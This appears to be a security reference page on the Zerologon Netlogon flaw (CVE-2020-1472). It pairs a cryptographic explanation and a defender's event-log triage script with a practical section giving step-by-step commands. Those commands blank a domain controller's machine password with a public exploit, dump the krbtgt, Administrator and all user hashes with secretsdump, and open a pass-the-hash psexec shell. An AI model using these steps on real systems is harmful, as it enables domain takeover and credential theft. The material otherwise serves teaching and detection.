Zerologon - CVE-2020-1472

Theory

Zerologon is a vulnerability in the cryptography of Microsoft's Netlogon Remote Protocol, the RPC interface that domain-joined machines use to authenticate to Active Directory domain controllers. It allows an attacker to impersonate any computer in the domain, including the domain controller itself.

More: https://www.trendmicro.com/en_in/what-is/zerologon.html
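The cryptographic flaw is a cipher-mode property, not a broken primitive: Netlogon computes its credential value with AES-128 in CFB8 mode using a fixed all-zero IV. The script below is an added example (it is not code from this page or from the Secura and RiskSense tools listed later) that shows why that choice fails. With a zero IV and an all-zero input, the CFB8 shift register stays all zeros as long as every keystream byte is 0x00, so the output is all zeros whenever the first byte of E_k(0^16) is 0x00, which happens for roughly 1 key in 256 and is independent of the key the attacker does not know. To keep the script dependency-free, the 16-byte block function is a stand-in for AES-128 built from SHA-256 (an assumption: the mode behaviour is the same for any 16-byte block cipher). It also shows that a non-zero IV removes the 1-in-256 outcome, which is why fixed IVs are unsafe in CFB8.

```python
"""Why a zero IV in CFB8 mode breaks Netlogon's credential check (added
example, not from the page).  The block function is a SHA-256 stand-in for
AES-128 so that the script runs without third-party libraries."""
import hashlib

BLOCK = 16


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for AES-128 on one block (assumption: any key-dependent
    16-byte-to-16-byte function shows the same CFB8 mode behaviour)."""
    assert len(block) == BLOCK
    return hashlib.sha256(key + block).digest()[:BLOCK]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8: encrypt the 16-byte shift register, XOR its first byte with the
    next plaintext byte, then shift that ciphertext byte into the register."""
    assert len(iv) == BLOCK
    shift = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream = block_encrypt(key, bytes(shift))
        c = p ^ keystream[0]
        out.append(c)
        del shift[0]        # drop the oldest byte ...
        shift.append(c)     # ... and feed the ciphertext byte back in
    return bytes(out)


def is_weak_key(key: bytes) -> bool:
    """A key is 'weak' under a zero IV iff the first keystream byte is 0x00."""
    return block_encrypt(key, bytes(BLOCK))[0] == 0


def zero_iv_gives_zero_output(key: bytes, length: int = 8) -> bool:
    """True when CFB8(key, iv=0, plaintext=0^length) == 0^length.
    This is exactly the is_weak_key condition: once the first keystream byte
    is zero, the register never changes and every later byte is zero too."""
    return cfb8_encrypt(key, bytes(BLOCK), bytes(length)) == bytes(length)


def count_weak_keys(n: int) -> int:
    """Count, among n deterministic test keys (constructed: the integers
    0..n-1 as 16-byte big-endian values), those that yield an all-zero
    8-byte credential under a zero IV.  Expect roughly n / 256."""
    return sum(zero_iv_gives_zero_output(i.to_bytes(BLOCK, "big")) for i in range(n))


def nonzero_iv_gives_zero_output(key: bytes, iv: bytes, length: int = 8) -> bool:
    """Same check with a caller-supplied IV.  With a non-zero IV the first
    keystream byte depends on the IV, so an all-zero result needs all
    `length` bytes to vanish independently (about 2^-64 for 8 bytes)."""
    return cfb8_encrypt(key, iv, bytes(length)) == bytes(length)


if __name__ == "__main__":
    n = 8192
    weak = count_weak_keys(n)
    print(f"{weak} of {n} test keys give an all-zero credential under a zero IV "
          f"(expected about {n // 256})")
    iv = bytes(range(1, BLOCK + 1))   # constructed non-zero IV
    still_zero = sum(nonzero_iv_gives_zero_output(i.to_bytes(BLOCK, "big"), iv)
                     for i in range(n))
    print(f"{still_zero} of {n} test keys give an all-zero credential with a non-zero IV")
```

The 1-in-256 figure is what turns a cryptographic detail into an authentication bypass: a client that does not know the key can submit an all-zero credential and expect one attempt in 256 to validate. Microsoft's remediation did not change the cipher mode; it enforces secure RPC (signing and sealing) on the Netlogon channel so the credential check is no longer the only barrier.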


Practical

Test for Zerologon Vulnerability

git clone https://github.com/SecuraBV/CVE-2020-1472.git

cd CVE-2020-1472

pip3 install -r requirements.txt

./zerologon_tester.py EXAMPLE-DC 1.2.3.4

Exploit Zerologon Vulnerability

git clone https://github.com/risksense/zerologon.git

cd zerologon

pip3 install -r requirements.txt

python3 set_empty_pw.py DC_NETBIOS_NAME DC_IP_ADDR

Dump Password Hashes

# Dump krbtgt user hash
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18 -just-dc-user krbtgt

# Dump Administrator user hash
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18 -just-dc-user Administrator

# Dump all user hashes
sudo impacket-secretsdump -no-pass 'DC-ZEROLOGON$'@212.129.28.18

Remote Shell

./psexec.py /Administrator@212.129.28.18 -hashes aad3b435b51404eeaad3b435b51404ee:777b1935ff37faba2b2c299288b0693b
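The steps above leave traces a defender can look for. Resetting the domain controller's machine account password the way set_empty_pw does produces a Security event 4742 ("A computer account was changed") on the DC whose Subject is ANONYMOUS LOGON (S-1-5-7) and whose changed attributes include Password Last Set; a legitimate rotation is performed by the computer account itself. Separately, the August 2020 Netlogon patch added System events 5827/5828 (a vulnerable secure channel was denied) and 5829/5830/5831 (a vulnerable secure channel was still allowed), which tell you which devices remain unprotected. The triage script below is an added example, not code from this page or from the tools it lists. Its log records are constructed sample data in a simplified JSON-lines shape (assumption: a log pipeline has already flattened the event XML into the field names used here).

```python
"""Triage of Windows event records for Zerologon exploitation and for the
Netlogon enforcement events (added example, not from the page).  Input is
constructed, simplified JSON lines; field names are assumed."""
import json

ANONYMOUS_LOGON_SID = "S-1-5-7"
NETLOGON_DENIED = {5827, 5828}              # vulnerable channel refused
NETLOGON_ALLOWED_VULNERABLE = {5829, 5830, 5831}  # vulnerable channel still allowed

# Constructed sample log: one benign DC password rotation, one reset by an
# anonymous caller, two Netlogon enforcement events and one unrelated logon.
SAMPLE_LOG = """\
{"EventID": 4742, "Channel": "Security", "SubjectUserSid": "S-1-5-18", "SubjectUserName": "DC01$", "TargetUserName": "DC01$", "PasswordLastSet": "2020-09-14 03:02:11"}
{"EventID": 4742, "Channel": "Security", "SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON", "TargetUserName": "DC01$", "PasswordLastSet": "2020-09-15 10:41:07"}
{"EventID": 5827, "Channel": "System", "MachineAccountName": "WS-FINANCE-07$", "ClientIP": "10.0.5.23"}
{"EventID": 5829, "Channel": "System", "MachineAccountName": "LEGACY-NAS$", "ClientIP": "10.0.9.4"}
{"EventID": 4624, "Channel": "Security", "SubjectUserSid": "S-1-0-0", "TargetUserName": "alice", "LogonType": 3}
"""


def classify(event: dict):
    """Return (severity, message) for a record worth acting on, else None."""
    eid = event.get("EventID")
    if eid == 4742:
        # In 4742 an unchanged attribute is logged as "-".
        pw_changed = event.get("PasswordLastSet", "-") != "-"
        target = event.get("TargetUserName", "?")
        if pw_changed and event.get("SubjectUserSid") == ANONYMOUS_LOGON_SID:
            return ("critical",
                    f"password of {target} reset by ANONYMOUS LOGON: "
                    f"possible CVE-2020-1472 exploitation")
        return None
    if eid in NETLOGON_DENIED:
        return ("high",
                f"DC denied vulnerable Netlogon channel from "
                f"{event.get('MachineAccountName', '?')} ({event.get('ClientIP', '?')}): "
                f"patch the device or investigate as an attack attempt")
    if eid in NETLOGON_ALLOWED_VULNERABLE:
        return ("medium",
                f"DC still allows vulnerable Netlogon channel from "
                f"{event.get('MachineAccountName', '?')} ({event.get('ClientIP', '?')}): "
                f"device is unprotected until fixed and enforcement is on")
    return None


def triage(log_text: str):
    """Parse JSON lines and return [(EventID, severity, message), ...]
    in log order, skipping blank or malformed lines."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        hit = classify(event)
        if hit is not None:
            findings.append((event.get("EventID"), hit[0], hit[1]))
    return findings


if __name__ == "__main__":
    for eid, severity, message in triage(SAMPLE_LOG):
        print(f"[{severity.upper():8}] {eid}: {message}")
```

The benign 4742 (subject S-1-5-18, the DC changing its own password during normal rotation) produces no finding; only the anonymous reset does. Treat the 5829 series as an inventory of devices that still need the Netlogon fix, and 5827/5828 after enforcement as either a missed device or an exploitation attempt that the patch blocked.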

